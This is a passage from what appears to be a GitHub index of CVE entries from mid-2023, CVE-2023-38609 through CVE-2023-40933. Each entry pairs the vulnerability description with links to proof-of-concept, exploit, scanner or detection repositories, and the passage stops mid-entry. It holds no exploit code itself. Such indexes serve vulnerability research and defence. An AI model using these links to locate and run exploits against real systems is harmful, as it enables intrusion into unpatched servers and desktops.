- [mc-17/CVE-2023-38609](https://github.com/mc-17/CVE-2023-38609)
### CVE-2023-38632 (2023-07-21)
async-sockets-cpp through 0.3.1 has a stack-based buffer overflow in tcpsocket.hpp when processing malformed TCP packets.
- [Halcy0nic/CVE-2023-38632](https://github.com/Halcy0nic/CVE-2023-38632)
### CVE-2023-38646 (2023-07-21)
Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.
- [adriyansyah-mf/CVE-2023-38646--Metabase-](https://github.com/adriyansyah-mf/CVE-2023-38646--Metabase-)
- [Pumpkin-Garden/POC_Metabase_CVE-2023-38646](https://github.com/Pumpkin-Garden/POC_Metabase_CVE-2023-38646)
- [0xrobiul/CVE-2023-38646](https://github.com/0xrobiul/CVE-2023-38646)
- [Chocapikk/CVE-2023-38646](https://github.com/Chocapikk/CVE-2023-38646)
- [Xuxfff/CVE-2023-38646-Poc](https://github.com/Xuxfff/CVE-2023-38646-Poc)
- [securezeron/CVE-2023-38646](https://github.com/securezeron/CVE-2023-38646)
- [raytheon0x21/CVE-2023-38646](https://github.com/raytheon0x21/CVE-2023-38646)
- [Zenmovie/CVE-2023-38646](https://github.com/Zenmovie/CVE-2023-38646)
- [shamo0/CVE-2023-38646-PoC](https://github.com/shamo0/CVE-2023-38646-PoC)
- [fidjiw/CVE-2023-38646-POC](https://github.com/fidjiw/CVE-2023-38646-POC)
- [Any3ite/cve-2023-38646-metabase-ReverseShell](https://github.com/Any3ite/cve-2023-38646-metabase-ReverseShell)
- [robotmikhro/CVE-2023-38646](https://github.com/robotmikhro/CVE-2023-38646)
- [kh4sh3i/CVE-2023-38646](https://github.com/kh4sh3i/CVE-2023-38646)
- [yxl2001/CVE-2023-38646](https://github.com/yxl2001/CVE-2023-38646)
- [alexandre-pecorilla/CVE-2023-38646](https://github.com/alexandre-pecorilla/CVE-2023-38646)
- [m3m0o/metabase-pre-auth-rce-poc](https://github.com/m3m0o/metabase-pre-auth-rce-poc)
- [CN016/Metabase-H2-CVE-2023-38646-](https://github.com/CN016/Metabase-H2-CVE-2023-38646-)
- [Boogipop/MetabaseRceTools](https://github.com/Boogipop/MetabaseRceTools)
- [SUT0L/CVE-2023-38646](https://github.com/SUT0L/CVE-2023-38646)
- [nickswink/CVE-2023-38646](https://github.com/nickswink/CVE-2023-38646)
- [passwa11/CVE-2023-38646](https://github.com/passwa11/CVE-2023-38646)
- [threatHNTR/CVE-2023-38646](https://github.com/threatHNTR/CVE-2023-38646)
- [asepsaepdin/CVE-2023-38646](https://github.com/asepsaepdin/CVE-2023-38646)
- [Pyr0sec/CVE-2023-38646](https://github.com/Pyr0sec/CVE-2023-38646)
- [birdm4nw/CVE-2023-38646](https://github.com/birdm4nw/CVE-2023-38646)
- [AnvithLobo/CVE-2023-38646](https://github.com/AnvithLobo/CVE-2023-38646)
- [Red4mber/CVE-2023-38646](https://github.com/Red4mber/CVE-2023-38646)
- [junnythemarksman/CVE-2023-38646](https://github.com/junnythemarksman/CVE-2023-38646)
- [Mrunalkaran/CVE-2023-38646](https://github.com/Mrunalkaran/CVE-2023-38646)
- [j0yb0y0h/CVE-2023-38646](https://github.com/j0yb0y0h/CVE-2023-38646)
- [Ego1stoo/CVE-2023-38646](https://github.com/Ego1stoo/CVE-2023-38646)
- [0utl4nder/Another-Metabase-RCE-CVE-2023-38646](https://github.com/0utl4nder/Another-Metabase-RCE-CVE-2023-38646)
- [Shisones/MetabaseRCE_CVE-2023-38646](https://github.com/Shisones/MetabaseRCE_CVE-2023-38646)
- [acesoyeo/METABASE-RCE-CVE-2023-38646-](https://github.com/acesoyeo/METABASE-RCE-CVE-2023-38646-)
- [UserConnecting/Exploit-CVE-2023-38646-Metabase](https://github.com/UserConnecting/Exploit-CVE-2023-38646-Metabase)
### CVE-2023-38709 (2024-04-04)
Faulty input validation in the core of Apache allows malicious or exploitable backend/content generators to split HTTP responses.\n\nThis issue affects Apache HTTP Server: through 2.4.58.
- [mrmtwoj/apache-vulnerability-testing](https://github.com/mrmtwoj/apache-vulnerability-testing)
### CVE-2023-38743 (2023-09-11)
Zoho ManageEngine ADManager Plus before Build 7200 allows admin users to execute commands on the host machine.
- [PetrusViet/CVE-2023-38743](https://github.com/PetrusViet/CVE-2023-38743)
### CVE-2023-38817 (2023-10-11)
An issue in Inspect Element Ltd Echo.ac v.5.2.1.0 allows a local attacker to gain privileges via a crafted command to the echo_driver.sys component. NOTE: the vendor's position is that the reported ability for user-mode applications to execute code as NT AUTHORITY\SYSTEM was "deactivated by Microsoft itself."
- [vxcall/kur](https://github.com/vxcall/kur)
### CVE-2023-38820
- [TraiLeR2/DLL-Planting-Slack-4.33.73-CVE-2023-38820](https://github.com/TraiLeR2/DLL-Planting-Slack-4.33.73-CVE-2023-38820)
### CVE-2023-38821
- [TraiLeR2/CoD-MW-Warzone-2---CVE-2023-38821](https://github.com/TraiLeR2/CoD-MW-Warzone-2---CVE-2023-38821)
### CVE-2023-38822
- [TraiLeR2/Corsair---DLL-Planting-CVE-2023-38822](https://github.com/TraiLeR2/Corsair---DLL-Planting-CVE-2023-38822)
### CVE-2023-38829 (2023-09-11)
An issue in NETIS SYSTEMS WF2409E v.3.6.42541 allows a remote attacker to execute arbitrary code via the ping and traceroute functions of the diagnostic tools component in the admin management interface.
- [adhikara13/CVE-2023-38829-NETIS-WF2409E](https://github.com/adhikara13/CVE-2023-38829-NETIS-WF2409E)
### CVE-2023-38831 (2023-08-23)
RARLAB WinRAR before 6.23 allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive. The issue occurs because a ZIP archive may include a benign file (such as an ordinary .JPG file) and also a folder that has the same name as the benign file, and the contents of the folder (which may include executable content) are processed during an attempt to access only the benign file. This was exploited in the wild in April through October 2023.
- [BoredHackerBlog/winrar_CVE-2023-38831_lazy_poc](https://github.com/BoredHackerBlog/winrar_CVE-2023-38831_lazy_poc)
- [b1tg/CVE-2023-38831-winrar-exploit](https://github.com/b1tg/CVE-2023-38831-winrar-exploit)
- [IR-HuntGuardians/CVE-2023-38831-HUNT](https://github.com/IR-HuntGuardians/CVE-2023-38831-HUNT)
- [Garck3h/cve-2023-38831](https://github.com/Garck3h/cve-2023-38831)
- [ignis-sec/CVE-2023-38831-RaRCE](https://github.com/ignis-sec/CVE-2023-38831-RaRCE)
- [HDCE-inc/CVE-2023-38831](https://github.com/HDCE-inc/CVE-2023-38831)
- [Maalfer/CVE-2023-38831_ReverseShell_Winrar-RCE](https://github.com/Maalfer/CVE-2023-38831_ReverseShell_Winrar-RCE)
- [knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831](https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831)
- [akhomlyuk/cve-2023-38831](https://github.com/akhomlyuk/cve-2023-38831)
- [PascalAsch/CVE-2023-38831-KQL](https://github.com/PascalAsch/CVE-2023-38831-KQL)
- [ahmed-fa7im/CVE-2023-38831-winrar-expoit-simple-Poc](https://github.com/ahmed-fa7im/CVE-2023-38831-winrar-expoit-simple-Poc)
- [thegr1ffyn/CVE-2023-38831](https://github.com/thegr1ffyn/CVE-2023-38831)
- [MortySecurity/CVE-2023-38831-Exploit-and-Detection](https://github.com/MortySecurity/CVE-2023-38831-Exploit-and-Detection)
- [z3r0sw0rd/CVE-2023-38831-PoC](https://github.com/z3r0sw0rd/CVE-2023-38831-PoC)
- [sh770/CVE-2023-38831](https://github.com/sh770/CVE-2023-38831)
- [BeniB3astt/CVE-2023-38831_ReverseShell_Winrar](https://github.com/BeniB3astt/CVE-2023-38831_ReverseShell_Winrar)
- [MorDavid/CVE-2023-38831-Winrar-Exploit-Generator-POC](https://github.com/MorDavid/CVE-2023-38831-Winrar-Exploit-Generator-POC)
- [Mich-ele/CVE-2023-38831-winrar](https://github.com/Mich-ele/CVE-2023-38831-winrar)
- [asepsaepdin/CVE-2023-38831](https://github.com/asepsaepdin/CVE-2023-38831)
- [Fa1c0n35/CVE-2023-38831-winrar-exploit](https://github.com/Fa1c0n35/CVE-2023-38831-winrar-exploit)
- [xaitax/WinRAR-CVE-2023-38831](https://github.com/xaitax/WinRAR-CVE-2023-38831)
- [GOTonyGO/CVE-2023-38831-winrar](https://github.com/GOTonyGO/CVE-2023-38831-winrar)
- [Malwareman007/CVE-2023-38831](https://github.com/Malwareman007/CVE-2023-38831)
- [ameerpornillos/CVE-2023-38831-WinRAR-Exploit](https://github.com/ameerpornillos/CVE-2023-38831-WinRAR-Exploit)
- [an040702/CVE-2023-38831](https://github.com/an040702/CVE-2023-38831)
- [elefantesagradodeluzinfinita/cve-2023-38831](https://github.com/elefantesagradodeluzinfinita/cve-2023-38831)
- [malvika-thakur/CVE-2023-38831](https://github.com/malvika-thakur/CVE-2023-38831)
- [ruycr4ft/CVE-2023-38831](https://github.com/ruycr4ft/CVE-2023-38831)
- [Nielk74/CVE-2023-38831](https://github.com/Nielk74/CVE-2023-38831)
- [kehrijksen/CVE-2023-38831](https://github.com/kehrijksen/CVE-2023-38831)
- [h3xecute/SideCopy-Exploits-CVE-2023-38831](https://github.com/h3xecute/SideCopy-Exploits-CVE-2023-38831)
- [s4m98/winrar-cve-2023-38831-poc-gen](https://github.com/s4m98/winrar-cve-2023-38831-poc-gen)
- [xk-mt/WinRAR-Vulnerability-recurrence-tutorial](https://github.com/xk-mt/WinRAR-Vulnerability-recurrence-tutorial)
- [MyStuffYT/CVE-2023-38831-POC](https://github.com/MyStuffYT/CVE-2023-38831-POC)
- [SpamixOfficial/CVE-2023-38831](https://github.com/SpamixOfficial/CVE-2023-38831)
- [r1yaz/winDED](https://github.com/r1yaz/winDED)
- [youmulijiang/evil-winrar](https://github.com/youmulijiang/evil-winrar)
- [solomon12354/VolleyballSquid-----CVE-2023-38831-and-Bypass-UAC](https://github.com/solomon12354/VolleyballSquid-----CVE-2023-38831-and-Bypass-UAC)
- [RomainBayle08/CVE-2023-38831](https://github.com/RomainBayle08/CVE-2023-38831)
- [imbyter/imbyter-WinRAR_CVE-2023-38831](https://github.com/imbyter/imbyter-WinRAR_CVE-2023-38831)
- [UnHackerEnCapital/PDFernetRemotelo](https://github.com/UnHackerEnCapital/PDFernetRemotelo)
- [Hirusha-N/CVE-2021-34527-CVE-2023-38831-and-CVE-2023-32784](https://github.com/Hirusha-N/CVE-2021-34527-CVE-2023-38831-and-CVE-2023-32784)
- [khanhtranngoccva/cve-2023-38831-poc](https://github.com/khanhtranngoccva/cve-2023-38831-poc)
- [MaorBuskila/Windows-X64-RAT](https://github.com/MaorBuskila/Windows-X64-RAT)
- [yezzfusl/cve_2023_38831_scanner](https://github.com/yezzfusl/cve_2023_38831_scanner)
- [FirFirdaus/CVE-2023-38831](https://github.com/FirFirdaus/CVE-2023-38831)
- [ra3edAJ/LAB-DFIR-cve-2023-38831](https://github.com/ra3edAJ/LAB-DFIR-cve-2023-38831)
- [technicalcorp0/CVE-2023-38831-Exploit](https://github.com/technicalcorp0/CVE-2023-38831-Exploit)
- [idkwastaken/CVE-2023-38831](https://github.com/idkwastaken/CVE-2023-38831)
### CVE-2023-38836 (2023-08-21)
File Upload vulnerability in BoidCMS v.2.0.0 allows a remote attacker to execute arbitrary code by adding a GIF header to bypass MIME type checks.
- [1337kid/CVE-2023-38836](https://github.com/1337kid/CVE-2023-38836)
### CVE-2023-38840 (2023-08-15)
Bitwarden Desktop 2023.7.0 and below allows an attacker with local access to obtain sensitive information via the Bitwarden.exe process.
- [markuta/bw-dump](https://github.com/markuta/bw-dump)
### CVE-2023-38890 (2023-08-18)
Online Shopping Portal Project 3.1 allows remote attackers to execute arbitrary SQL commands/queries via the login form, leading to unauthorized access and potential data manipulation. This vulnerability arises due to insufficient validation of user-supplied input in the username field, enabling SQL Injection attacks.
- [akshadjoshi/CVE-2023-38890](https://github.com/akshadjoshi/CVE-2023-38890)
### CVE-2023-38891 (2023-09-14)
SQL injection vulnerability in Vtiger CRM v.7.5.0 allows a remote authenticated attacker to escalate privileges via the getQueryColumnsList function in ReportRun.php.
- [jselliott/CVE-2023-38891](https://github.com/jselliott/CVE-2023-38891)
### CVE-2023-39024
- [BenTheCyberOne/CVE-2023-39024-5-POC](https://github.com/BenTheCyberOne/CVE-2023-39024-5-POC)
### CVE-2023-39062 (2023-08-28)
Cross Site Scripting vulnerability in Spipu HTML2PDF before v.5.2.8 allows a remote attacker to execute arbitrary code via a crafted script to the forms.php.
- [afine-com/CVE-2023-39062](https://github.com/afine-com/CVE-2023-39062)
### CVE-2023-39063 (2023-09-11)
Buffer Overflow vulnerability in RaidenFTPD 2.4.4005 allows a local attacker to execute arbitrary code via the Server name field of the Step by step setup wizard.
- [AndreGNogueira/CVE-2023-39063](https://github.com/AndreGNogueira/CVE-2023-39063)
### CVE-2023-39115 (2023-08-16)
install/aiz-uploader/upload in Campcodes Online Matrimonial Website System Script 3.3 allows XSS via a crafted SVG document.
- [Raj789-sec/CVE-2023-39115](https://github.com/Raj789-sec/CVE-2023-39115)
### CVE-2023-39144 (2023-08-03)
Element55 KnowMore appliances version 21 and older was discovered to store passwords in plaintext.
- [cduram/CVE-2023-39144](https://github.com/cduram/CVE-2023-39144)
### CVE-2023-39320 (2023-09-08)
The go.mod toolchain directive, introduced in Go 1.21, can be leveraged to execute scripts and binaries relative to the root of the module when the "go" command was executed within the module. This applies to modules downloaded using the "go" command from the module proxy, as well as modules downloaded directly using VCS software.
- [ayrustogaru/cve-2023-39320](https://github.com/ayrustogaru/cve-2023-39320)
### CVE-2023-39361 (2023-09-05)
Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.
- [HPT-Intern-Task-Submission/CVE-2023-39361](https://github.com/HPT-Intern-Task-Submission/CVE-2023-39361)
### CVE-2023-39362 (2023-09-05)
Cacti is an open source operational monitoring and fault management framework. In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server. The `lib/snmp.php` file has a set of functions, with similar behavior, that accept in input some variables and place them into an `exec` call without a proper escape or validation. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.
- [m3ssap0/cacti-rce-snmp-options-vulnerable-application](https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application)
- [jakabakos/CVE-2023-39362-cacti-snmp-command-injection-poc](https://github.com/jakabakos/CVE-2023-39362-cacti-snmp-command-injection-poc)
### CVE-2023-39526 (2023-08-07)
PrestaShop is an open source e-commerce web application. Versions prior to 1.7.8.10, 8.0.5, and 8.1.1 are vulnerable to remote code execution through SQL injection and arbitrary file write in the back office. Versions 1.7.8.10, 8.0.5, and 8.1.1 contain a patch. There are no known workarounds.
- [dnkhack/fixcve2023_39526_2023_39527](https://github.com/dnkhack/fixcve2023_39526_2023_39527)
### CVE-2023-39539 (2023-12-06)
\nAMI AptioV contains a vulnerability in BIOS where a User may cause an unrestricted upload of a PNG Logo file with dangerous type by Local access. A successful exploit of this vulnerability may lead to a loss of Confidentiality, Integrity, and/or Availability. \n\n\n\n\n\n
- [AdamWen230/CVE-2023-39539-PoC](https://github.com/AdamWen230/CVE-2023-39539-PoC)
### CVE-2023-39593
- [Ant1sec-ops/CVE-2023-39593](https://github.com/Ant1sec-ops/CVE-2023-39593)
### CVE-2023-39707 (2023-08-25)
A stored cross-site scripting (XSS) vulnerability in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Add Expense parameter under the Expense section.
- [Arajawat007/CVE-2023-39707](https://github.com/Arajawat007/CVE-2023-39707)
### CVE-2023-39708 (2023-08-28)
A stored cross-site scripting (XSS) vulnerability in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Add New parameter under the New Buy section.
- [Arajawat007/CVE-2023-39708](https://github.com/Arajawat007/CVE-2023-39708)
### CVE-2023-39709 (2023-08-28)
Multiple cross-site scripting (XSS) vulnerabilities in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name, Address, and Company parameters under the Add Member section.
- [Arajawat007/CVE-2023-39709](https://github.com/Arajawat007/CVE-2023-39709)
### CVE-2023-39710 (2023-09-01)
Multiple cross-site scripting (XSS) vulnerabilities in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name, Address, and Company parameters under the Add Customer section.
- [Arajawat007/CVE-2023-39710](https://github.com/Arajawat007/CVE-2023-39710)
### CVE-2023-39711 (2023-09-07)
Multiple cross-site scripting (XSS) vulnerabilities in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Subtotal and Paidbill parameters under the Add New Put section.
- [Arajawat007/CVE-2023-39711](https://github.com/Arajawat007/CVE-2023-39711)
### CVE-2023-39712 (2023-09-08)
Multiple cross-site scripting (XSS) vulnerabilities in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name, Address, and Company parameters under the Add New Put section.
- [Arajawat007/CVE-2023-39712](https://github.com/Arajawat007/CVE-2023-39712)
### CVE-2023-39714 (2023-09-01)
Multiple cross-site scripting (XSS) vulnerabilities in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name, Address, and Company parameters under the Add New Member section.
- [Arajawat007/CVE-2023-39714](https://github.com/Arajawat007/CVE-2023-39714)
### CVE-2023-39725
- [anky-123/CVE-2023-39725](https://github.com/anky-123/CVE-2023-39725)
### CVE-2023-40000 (2024-04-16)
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LiteSpeed Technologies LiteSpeed Cache allows Stored XSS.This issue affects LiteSpeed Cache: from n/a through 5.7.\n\n
- [rxerium/CVE-2023-40000](https://github.com/rxerium/CVE-2023-40000)
- [quantiom/litespeed-cache-xss-poc](https://github.com/quantiom/litespeed-cache-xss-poc)
- [iveresk/cve-2023-40000](https://github.com/iveresk/cve-2023-40000)
### CVE-2023-40028 (2023-08-15)
Ghost is an open source content management system. Versions prior to 5.59.1 are subject to a vulnerability which allows authenticated users to upload files that are symlinks. This can be exploited to perform an arbitrary file read of any file on the host operating system. Site administrators can check for exploitation of this issue by looking for unknown symlinks within Ghost's `content/` folder. Version 5.59.1 contains a fix for this issue. All users are advised to upgrade. There are no known workarounds for this vulnerability.
- [0xyassine/CVE-2023-40028](https://github.com/0xyassine/CVE-2023-40028)
### CVE-2023-40031 (2023-08-25)
Notepad++ is a free and open-source source code editor. Versions 8.5.6 and prior are vulnerable to heap buffer write overflow in `Utf8_16_Read::convert`. This issue may lead to arbitrary code execution. As of time of publication, no known patches are available in existing versions of Notepad++.
- [webraybtl/CVE-2023-40031](https://github.com/webraybtl/CVE-2023-40031)
### CVE-2023-40037 (2023-08-18)
Apache NiFi 1.21.0 through 1.23.0 support JDBC and JNDI JMS access in several Processors and Controller Services with connection URL validation that does not provide sufficient protection against crafted inputs. An authenticated and authorized user can bypass connection URL validation using custom input formatting. The resolution enhances connection URL validation and introduces validation for additional related properties. Upgrading to Apache NiFi 1.23.1 is the recommended mitigation.\n
- [mbadanoiu/CVE-2023-40037](https://github.com/mbadanoiu/CVE-2023-40037)
### CVE-2023-40044 (2023-09-27)
\nIn WS_FTP Server versions prior to 8.7.4 and 8.8.2, a pre-authenticated attacker could leverage a .NET deserialization vulnerability in the Ad Hoc Transfer module to execute remote commands on the underlying WS_FTP Server operating system. \n\n
- [kenbuckler/WS_FTP-CVE-2023-40044](https://github.com/kenbuckler/WS_FTP-CVE-2023-40044)
### CVE-2023-40084 (2023-12-04)
In run of MDnsSdListener.cpp, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
- [Trinadh465/platform_system_netd_AOSP10_r33_CVE-2023-40084](https://github.com/Trinadh465/platform_system_netd_AOSP10_r33_CVE-2023-40084)
### CVE-2023-40109 (2024-02-15)
In createFromParcel of UsbConfiguration.java, there is a possible background activity launch (BAL) due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.
- [uthrasri/CVE-2023-40109](https://github.com/uthrasri/CVE-2023-40109)
### CVE-2023-40121 (2023-10-27)
In appendEscapedSQLString of DatabaseUtils.java, there is a possible SQL injection due to unsafe deserialization. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.
- [hshivhare67/platform_framework_base_AOSP6_r22_CVE-2023-40121](https://github.com/hshivhare67/platform_framework_base_AOSP6_r22_CVE-2023-40121)
- [hshivhare67/platform_framework_base_android-4.2.2_r1_CVE-2023-40121](https://github.com/hshivhare67/platform_framework_base_android-4.2.2_r1_CVE-2023-40121)
### CVE-2023-40127 (2023-10-27)
In multiple locations, there is a possible way to access screenshots due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.
- [Trinadh465/platform_packages_providers_MediaProvider_CVE-2023-40127](https://github.com/Trinadh465/platform_packages_providers_MediaProvider_CVE-2023-40127)
- [Trinadh465/CVE-2023-40127](https://github.com/Trinadh465/CVE-2023-40127)
- [saurabh2088/platform_packages_providers_MediaProvider_CVE-2023-40127](https://github.com/saurabh2088/platform_packages_providers_MediaProvider_CVE-2023-40127)
- [RenukaSelvar/platform_packages_providers_MediaProvider_CVE-2023-40127](https://github.com/RenukaSelvar/platform_packages_providers_MediaProvider_CVE-2023-40127)
- [RenukaSelvar/packages_providers_MediaProvider_CVE-2023-40127](https://github.com/RenukaSelvar/packages_providers_MediaProvider_CVE-2023-40127)
### CVE-2023-40133 (2023-10-27)
In multiple locations of DialogFillUi.java, there is a possible way to view another user's images due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.
- [uthrasri/frame_CVE-2023-40133_136_137](https://github.com/uthrasri/frame_CVE-2023-40133_136_137)
### CVE-2023-40140 (2023-10-27)
In android_view_InputDevice_create of android_view_InputDevice.cpp, there is a possible way to execute arbitrary code due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
- [hshivhare67/platform_frameworks_base_android-4.2.2_r1_CVE-2023-40140](https://github.com/hshivhare67/platform_frameworks_base_android-4.2.2_r1_CVE-2023-40140)
- [hshivhare67/platform_frameworks_base_AOSP6_r22_CVE-2023-40140](https://github.com/hshivhare67/platform_frameworks_base_AOSP6_r22_CVE-2023-40140)
### CVE-2023-40275 (2024-03-19)
An issue was discovered in OpenClinic GA 5.247.01. It allows retrieval of patient lists via queries such as findFirstname= to _common/search/searchByAjax/patientslistShow.jsp.
- [BugBountyHunterCVE/CVE-2023-40275](https://github.com/BugBountyHunterCVE/CVE-2023-40275)
### CVE-2023-40276 (2024-03-19)
An issue was discovered in OpenClinic GA 5.247.01. An Unauthenticated File Download vulnerability has been discovered in pharmacy/exportFile.jsp.
- [BugBountyHunterCVE/CVE-2023-40276](https://github.com/BugBountyHunterCVE/CVE-2023-40276)
### CVE-2023-40277 (2024-03-19)
An issue was discovered in OpenClinic GA 5.247.01. A Reflected Cross-Site Scripting (XSS) vulnerability has been discovered in the login.jsp message parameter.
- [BugBountyHunterCVE/CVE-2023-40277](https://github.com/BugBountyHunterCVE/CVE-2023-40277)
### CVE-2023-40278 (2024-03-19)
An issue was discovered in OpenClinic GA 5.247.01. An Information Disclosure vulnerability has been identified in the printAppointmentPdf.jsp component of OpenClinic GA. By changing the AppointmentUid parameter, an attacker can determine whether a specific appointment exists based on the error message.
- [BugBountyHunterCVE/CVE-2023-40278](https://github.com/BugBountyHunterCVE/CVE-2023-40278)
### CVE-2023-40279 (2024-03-19)
An issue was discovered in OpenClinic GA 5.247.01. An attacker can perform a directory path traversal via the Page parameter in a GET request to main.do.
- [BugBountyHunterCVE/CVE-2023-40279](https://github.com/BugBountyHunterCVE/CVE-2023-40279)
### CVE-2023-40280 (2024-03-19)
An issue was discovered in OpenClinic GA 5.247.01. An attacker can perform a directory path traversal via the Page parameter in a GET request to popup.jsp.
- [BugBountyHunterCVE/CVE-2023-40280](https://github.com/BugBountyHunterCVE/CVE-2023-40280)
### CVE-2023-40294 (2023-08-14)
libboron in Boron 2.0.8 has a heap-based buffer overflow in ur_parseBlockI at i_parse_blk.c.
- [Halcy0nic/CVE-2023-40294-and-CVE-2023-40295](https://github.com/Halcy0nic/CVE-2023-40294-and-CVE-2023-40295)
### CVE-2023-40296 (2023-08-14)
async-sockets-cpp through 0.3.1 has a stack-based buffer overflow in ReceiveFrom and Receive in udpsocket.hpp when processing malformed UDP packets.
- [Halcy0nic/CVE-2023-40296](https://github.com/Halcy0nic/CVE-2023-40296)
### CVE-2023-40297 (-)
Stakater Forecastle 1.0.139 and before allows %5C../ directory traversal in the website component.
- [sahar042/CVE-2023-40297](https://github.com/sahar042/CVE-2023-40297)
### CVE-2023-40361 (2023-10-20)
SECUDOS Qiata (DOMOS OS) 4.13 has Insecure Permissions for the previewRm.sh daily cronjob. To exploit this, an attacker needs access as a low-privileged user to the underlying DOMOS system. Every user on the system has write permission for previewRm.sh, which is executed by the root user.
- [vianic/CVE-2023-40361](https://github.com/vianic/CVE-2023-40361)
### CVE-2023-40362 (2024-01-12)
An issue was discovered in CentralSquare Click2Gov Building Permit before October 2023. Lack of access control protections allows remote attackers to arbitrarily delete the contractors from any user's account when the user ID and contractor information is known.
- [ally-petitt/CVE-2023-40362](https://github.com/ally-petitt/CVE-2023-40362)
### CVE-2023-40404 (2023-10-25)
A use-after-free issue was addressed with improved memory management. This issue is fixed in macOS Sonoma 14.1. An app may be able to execute arbitrary code with kernel privileges.
- [geniuszlyy/GenEtherExploit](https://github.com/geniuszlyy/GenEtherExploit)
### CVE-2023-40429 (2023-09-26)
A permissions issue was addressed with improved validation. This issue is fixed in tvOS 17, iOS 17 and iPadOS 17, watchOS 10, macOS Sonoma 14. An app may be able to access sensitive user data.
- [biscuitehh/cve-2023-40429-ez-device-name](https://github.com/biscuitehh/cve-2023-40429-ez-device-name)
### CVE-2023-40459 (2023-12-04)
\n\n\n\n\n\n\n\n\nThe\nACEManager component of ALEOS 4.16 and earlier does not adequately perform\ninput sanitization during authentication, which could potentially result in a\nDenial of Service (DoS) condition for ACEManager without impairing other router\nfunctions. ACEManager recovers from the DoS condition by restarting within ten\nseconds of becoming unavailable.\n\n\n\n\n\n\n
- [majidmc2/CVE-2023-40459](https://github.com/majidmc2/CVE-2023-40459)
- [7h3w4lk3r/CVE-2023-40459](https://github.com/7h3w4lk3r/CVE-2023-40459)
### CVE-2023-40477 (2024-05-03)
RARLAB WinRAR Recovery Volume Improper Validation of Array Index Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of RARLAB WinRAR. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the processing of recovery volumes. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-21233.
- [winkler-winsen/Scan_WinRAR](https://github.com/winkler-winsen/Scan_WinRAR)
- [wildptr-io/Winrar-CVE-2023-40477-POC](https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC)
### CVE-2023-40600 (2023-11-30)
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Exactly WWW EWWW Image Optimizer. It works only when debug.log is turned on.This issue affects EWWW Image Optimizer: from n/a through 7.2.0.\n\n
- [RandomRobbieBF/CVE-2023-40600](https://github.com/RandomRobbieBF/CVE-2023-40600)
### CVE-2023-40626 (2023-11-29)
The language file parsing process could be manipulated to expose environment variables. Environment variables might contain sensible information.
- [TLWebdesign/Joomla-3.10.12-languagehelper-hotfix](https://github.com/TLWebdesign/Joomla-3.10.12-languagehelper-hotfix)
### CVE-2023-40868 (2023-09-14)
Cross Site Request Forgery vulnerability in mooSocial MooSocial Software v.Demo allows a remote attacker to execute arbitrary code via the Delete Account and Deactivate functions.
- [MinoTauro2020/CVE-2023-40868](https://github.com/MinoTauro2020/CVE-2023-40868)
### CVE-2023-40869 (2023-09-14)
Cross Site Scripting vulnerability in mooSocial mooSocial Software 3.1.6 and 3.1.7 allows a remote attacker to execute arbitrary code via a crafted script to the edit_menu, copuon, and group_categorias functions.
- [MinoTauro2020/CVE-2023-40869](https://github.com/MinoTauro2020/CVE-2023-40869)
### CVE-2023-40924 (2023-09-08)
SolarView Compact < 6.00 is vulnerable to Directory Traversal.
- [Yobing1/CVE-2023-40924](https://github.com/Yobing1/CVE-2023-40924)
### CVE-2023-40930 (2023-09-20)
An issue in the directory /system/bin/blkid of Skyworth v3.0 allows attackers to perform a directory traversal via mounting the Udisk to /mnt/.
- [NSnidie/CVE-2023-40930](https://github.com/NSnidie/CVE-2023-40930)
### CVE-2023-40931 (2023-09-19)
A SQL injection vulnerability in Nagios XI from version 5.11.0 up to and including 5.11.1 allows authenticated attackers to execute arbitrary SQL commands via the ID parameter in the POST request to /nagiosxi/admin/banner_message-ajaxhelper.php
- [sealldeveloper/CVE-2023-40931-PoC](https://github.com/sealldeveloper/CVE-2023-40931-PoC)
### CVE-2023-40933 (2023-09-19)
